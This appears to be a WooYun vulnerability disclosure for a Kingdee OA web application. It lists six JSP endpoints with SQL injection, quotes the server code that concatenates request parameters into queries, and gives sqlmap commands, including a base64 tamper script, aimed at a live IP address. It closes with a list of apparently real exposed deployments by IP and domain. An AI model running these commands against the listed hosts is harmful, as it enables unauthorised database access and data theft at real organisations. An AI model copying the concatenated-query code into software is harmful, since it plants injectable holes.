WooYun.org

/kingdee/flow_performance/add_search_case.jsp?name=1 name存在漏洞
/kingdee/flow_performance/add_view_case.jsp?name=1 name存在漏洞
/kingdee/flow_performance/del_search_case.jsp?id=1 id存在漏洞
/kingdee/flow_performance/del_view_case.jsp?id=1 id存在漏洞
/kingdee/flow_performance/flow_performance_data.jsp?search_case=1 search_case存在漏洞
/kingdee/flow_performance/flow_performance_display.jsp?user_id=1 user_id存在漏洞

<%
	String name = PubFunc.toString(request.getParameter("name"));
	name = sysUtil.pubUtil.CharBase64.Decode(name);
	String search_value = PubFunc.toString(request.getParameter("search_value"));
	search_value = sysUtil.pubUtil.CharBase64.Decode(search_value);
	TableCtrl db = new TableCtrl();
	if(db.getRowCount("select * from x_flow_performance_search_case where name='"+name+"'")>0){
		out.println("ERR1");
		return;
	}

sqlmap.py -u "http://221.226.149.17:8080/kingdee/flow_performance/add_search_case.jsp?name=1" --tamper "base64encode.py"

<%
	String id = PubFunc.toString(request.getParameter("id"));
	String name = PubFunc.toString(request.getParameter("name"));
	name = sysUtil.pubUtil.CharBase64.Decode(name);
	TableCtrl db = new TableCtrl();
	if(id.length()>0){
		if(db.getRowCount("select * from x_flow_performance_view_case where name='"+name+"' and id <>" + id)>0){
			out.println("ERR2");
			return;
		}
	}

sqlmap.py -u "http://221.226.149.17:8080/kingdee/flow_performance/add_view_case.jsp?name=1" --tamper "base64encode.py"

<%@ page contentType="text/html; charset=gbk" import="pub.*"%>
<%
	String id = PubFunc.toString(request.getParameter("id"));
	TableCtrl db = new TableCtrl();
	if(db.getRowCount("select * from x_flow_performance_view_case where search_case="+id)>0){
		out.println("ERR1");
		return;
	}
	int result = db.exec("delete from x_flow_performance_search_case where id="+id);
	if(result < 1)
		out.println("ERR");
	else
		out.println("OK|"+id);
%>

String issearch = PubFunc.toString(request.getParameter("issearch"));
String search_case = PubFunc.toString(request.getParameter("search_case"));
TableCtrl db = new TableCtrl();
if(!search_case.equals("")){
	String search_value = PubFunc.toString(db.getFieldValue("x_flow_performance_search_case","top 1 search_value","id="+search_case));

sqlmap.py -u "http://221.226.149.17:8080/kingdee/flow_performance/flow_performance_data.jsp?search_case=1" --dbms mssql

http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://122.139.60.103:800/kingdee/login/loginpage.jsp
http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp
http://222.179.238.182:8082/kingdee/login/loginpage2.jsp
http://222.134.77.23:8080/kingdee/login/loginpage.jsp
http://221.4.245.218:8080/kingdee/login/loginpage.jsp
http://221.226.149.17:8080/kingdee/login/loginpage.jsp
http://220.189.244.202:8080/kingdee/login/loginpage.jsp
http://222.133.44.10:8080/kingdee/login/loginpage.jsp
http://223.95.183.6:8080/kingdee/login/loginpage.jsp
http://61.190.20.51/kingdee/login/loginpage.jsp
http://60.194.110.187/kingdee/login/loginpage.jsp
http://oa.roen.cn/kingdee/login/loginpage.jsp